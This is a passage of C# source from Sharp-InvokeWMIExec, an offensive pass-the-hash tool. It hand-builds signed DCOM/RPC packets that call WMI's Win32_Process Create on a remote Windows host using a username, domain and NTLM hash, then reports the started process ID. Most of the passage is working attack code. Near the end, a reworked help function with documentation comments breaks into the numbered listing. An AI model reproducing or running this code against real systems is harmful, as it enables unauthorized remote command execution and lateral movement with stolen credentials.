0x00, 0x5e, 0x00, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0xca, 0x00, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0x8c, 0x00, 0x00, 0x00, 0x00, 0x49, 0x44, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x59, 0x01, 0x00, 0x00, 0x5e, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0xca, 0x00, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0x8c, 0x00, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0x11, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x73, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x43, 0x75, 0x72, 0x72, 0x65, 0x6e, 0x74, 0x44, 0x69, 0x72, 0x65, 0x63, 0x74, 0x6f, 0x72, 0x79, 0x00, 0x00, 0x73, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x85, 0x01, 0x00, 0x00, 0x00, 0x49, 0x6e, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1c, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x85, 0x01, 0x00, 0x00, 0xac, 0x01, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 0xe2, 0x01, 0x00, 0x00, 0x00, 0x57, 0x69, 0x6e, 0x33, 0x32, 0x41, 0x50, 0x49, 0x7c, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x20, 0x61, 0x6e, 0x64, 0x20, 0x54, 0x68, 0x72, 0x65, 0x61, 0x64, 0x20, 0x46, 0x75, 0x6e, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x73, 0x7c, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x7c, 0x6c, 0x70, 0x43, 0x75, 0x72, 0x72, 0x65, 0x6e, 0x74, 0x44, 0x69, 0x72, 0x65, 0x63, 0x74, 0x6f, 0x72, 0x79, 0x20, 0x00, 0x00, 0x4d, 0x61, 0x70, 0x70, 0x69, 0x6e, 0x67, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x73, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x29, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x85, 0x01, 0x00, 0x00, 0xac, 0x01, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x2b, 0x02, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0xda, 0x01, 0x00, 0x00, 0x00, 0x49, 0x44, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xba, 0x02, 0x00, 0x00, 0xac, 0x01, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x2b, 0x02, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0xda, 0x01, 0x00, 0x00, 0x72, 0x02, 0x00, 0x00, 0x11, 0x03, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x73, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x53, 0x74, 0x61, 0x72, 0x74, 0x75, 0x70, 0x49, 0x6e, 0x66, 0x6f, 0x72, 0x6d, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x00, 0x00, 0x6f, 0x62, 0x6a, 0x65, 0x63, 0x74, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xef, 0x02, 0x00, 0x00, 0x00, 0x49, 0x6e, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1c, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xef, 0x02, 0x00, 0x00, 0x16, 0x03, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 0x4c, 0x03, 0x00, 0x00, 0x00, 0x57, 0x4d, 0x49, 0x7c, 0x57, 0x69, 0x6e, 0x33, 0x32, 0x5f, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x53, 0x74, 0x61, 0x72, 0x74, 0x75, 0x70, 0x00, 0x00, 0x4d, 0x61, 0x70, 0x70, 0x69, 0x6e, 0x67, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x73, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x29, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xef, 
0x02, 0x00, 0x00, 0x16, 0x03, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x66, 0x03, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0x44, 0x03, 0x00, 0x00, 0x00, 0x49, 0x44, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xf5, 0x03, 0x00, 0x00, 0x16, 0x03, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x66, 0x03, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0x44, 0x03, 0x00, 0x00, 0xad, 0x03, 0x00, 0x00, 0x11, 0x03, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x6f, 0x62, 0x6a, 0x65, 0x63, 0x74, 0x3a, 0x57, 0x69, 0x6e, 0x33, 0x32, 0x5f, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x53, 0x74, 0x61, 0x72, 0x74, 0x75, 0x70 })
843 | .Concat(new byte[501])
844 | .Concat(Command_Length)
845 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3c, 0x0e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x01 })
846 | .Concat(Command_Length2)
847 | .Concat(new byte[] { 0x00, 0x80, 0x00, 0x5f, 0x5f, 0x50, 0x41, 0x52, 0x41, 0x4d, 0x45, 0x54, 0x45, 0x52, 0x53, 0x00, 0x00 })
848 | .Concat(Command_Bytes)
849 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
850 |
851 | if (Stub_Data.Length < Request_Split_Index)
852 | {
853 | Request_Flags = new byte[] { 0x83 };
854 | WMI_Client_Stage_Next = "Result";
855 | }
856 | else
857 | {
858 | Request_Split = true;
859 | double Request_Split_stage_final = Math.Ceiling((double)Stub_Data.Length / Request_Split_Index);
860 | if (Request_Split_Stage < 2)
861 | {
862 | Request_Length = Stub_Data.Length;
863 | Stub_Data = Utilities.GetByteRange(Stub_Data, 0, Request_Split_Index - 1);
864 | Request_Split_Stage = 2;
865 | Sequence_Number_Counter = 10;
866 | Request_Flags = new byte[] { 0x81 };
867 | Request_Split_Index_Tracker = Request_Split_Index;
868 | WMI_Client_Stage_Next = "Request";
869 | }
870 | else if (Request_Split_Stage == Request_Split_stage_final)
871 | {
872 | Request_Split = false;
873 | Sequence_Number = BitConverter.GetBytes(Sequence_Number_Counter);
874 | Request_Split_Stage = 0;
875 | Stub_Data = Utilities.GetByteRange(Stub_Data, Request_Split_Index_Tracker, Stub_Data.Length);
876 | Request_Flags = new byte[] { 0x82 };
877 | WMI_Client_Stage_Next = "Result";
878 | }
879 | else
880 | {
881 | Request_Length = Stub_Data.Length - Request_Split_Index_Tracker;
882 | Stub_Data = Utilities.GetByteRange(Stub_Data, Request_Split_Index_Tracker, Request_Split_Index_Tracker + Request_Split_Index - 1);
883 | Request_Split_Index_Tracker += Request_Split_Index;
884 | Request_Split_Stage++;
885 | Sequence_Number = BitConverter.GetBytes(Sequence_Number_Counter);
886 | Sequence_Number_Counter++;
887 | Request_Flags = new byte[] { 0x80 };
888 | WMI_Client_Stage_Next = "Request";
889 | }
890 | }
891 |
892 |
893 | }
894 |
895 | }
896 | break;
897 | }
898 | Packet_RPC = WMIExec.RPCRequest(Request_Flags, Stub_Data.Length, 16, Request_Auth_Padding, Request_Call_ID, Request_Context_ID, Request_Opnum, Request_UUID);
899 |
900 | if (Request_Split)
901 | {
902 | Packet_RPC["RPCRequest_AllocHint"] = BitConverter.GetBytes(Request_Length);
903 | }
904 |
905 | Packet_NTLMSSP_Verifier = WMIExec.NTLMSSPVerifier(Request_Auth_Padding, new byte[] { 0x04 }, Sequence_Number);
906 | NTLMSSP_Verifier = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Verifier);
907 | RPC_Sign = Sequence_Number.Concat(Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC))
908 | .Concat(Stub_Data)
909 | .Concat(Utilities.GetByteRange(NTLMSSP_Verifier, 0, Request_Auth_Padding + 7)).ToArray();
910 |
911 | RPC_Signature = HMAC_MD5.ComputeHash(RPC_Sign);
912 | RPC_Signature = Utilities.GetByteRange(RPC_Signature, 0, 7);
913 | Packet_NTLMSSP_Verifier["NTLMSSPVerifier_NTLMSSPVerifierChecksum"] = RPC_Signature;
914 | NTLMSSP_Verifier = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Verifier);
915 |
916 | WMI_Client_Send = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC).Concat(Stub_Data).Concat(NTLMSSP_Verifier).ToArray();
917 | WMI_Client_Random_Port_Stream.Write(WMI_Client_Send, 0, WMI_Client_Send.Length);
918 | WMI_Client_Random_Port_Stream.Flush();
919 |
920 | if (!Request_Split)
921 | {
922 | WMI_Client_Random_Port_Stream.Read(WMI_Client_Receive, 0, WMI_Client_Receive.Length);
923 | }
924 |
925 | while (WMI_Client_Random_Port_Stream.DataAvailable)
926 | {
927 | WMI_Client_Random_Port_Stream.Read(WMI_Client_Receive, 0, WMI_Client_Receive.Length);
928 | Thread.Sleep(10);
929 | }
930 | WMI_Client_Stage = WMI_Client_Stage_Next;
931 | }
932 | break;
933 | case "Result":
934 | {
935 | while (WMI_Client_Random_Port_Stream.DataAvailable)
936 | {
937 | WMI_Client_Random_Port_Stream.Read(WMI_Client_Receive, 0, WMI_Client_Receive.Length);
938 | Thread.Sleep(10);
939 | }
940 |
941 | if (WMI_Client_Receive[1145] != 9)
942 | {
943 | Target_Process_ID = Utilities.DataLength(1141, WMI_Client_Receive);
944 | success = true;
945 | }
946 |
947 | WMI_Client_Stage = "exit";
948 | }
949 | break;
950 | }
951 | Thread.Sleep(10);
952 | }
953 | WMI_Client_Random_Port.Close();
954 | WMI_Client_Random_Port_Stream.Close();
955 | }
956 | }
957 | WMI_Client.Close();
958 | WMI_Client_Stream.Close();
959 | }
960 | if (success)
961 | {
962 | output.AppendLine(String.Format("Command executed with process ID {0} on {1}", Target_Process_ID, Target_Long));
963 | }
964 | else
965 | {
966 | output.AppendLine("Process did not start, check your command");
967 | }
968 | Console.WriteLine(output.ToString());
969 | }
970 |
971 | //Begin Helper Functions.
/// <summary>
/// Prints <paramref name="message"/> followed by the usage line and then terminates
/// the process. This never returns: <see cref="Environment.Exit(int)"/> ends the
/// process with exit code -1, so callers must not expect control to come back.
/// </summary>
/// <param name="message">Caller-supplied text (typically why the arguments were
/// rejected) shown ahead of the usage line. It is passed as a format argument rather
/// than spliced into the format string, so braces in it are printed literally.</param>
/// <remarks>
/// NOTE(review): the usage line shows the NTLM hash being accepted as a command-line
/// argument. Command lines are commonly captured by process-creation auditing and
/// shell history, so operators should assume the credential ends up in logs.
/// </remarks>
public static void displayHelp(string message)
{
    // Build the banner first so the output is a single write; the placeholder,
    // argument and "\r\n" are the same as the original inline format call.
    string banner = String.Format("{0} \r\nSharp-InvokeWMIExec.exe username: domain: hash: target: command:", message);
    Console.WriteLine(banner);

    // Non-zero exit code tells the invoking shell/script that the arguments were bad.
    Environment.Exit(-1);
}
977 | }
978 | }
979 |
--------------------------------------------------------------------------------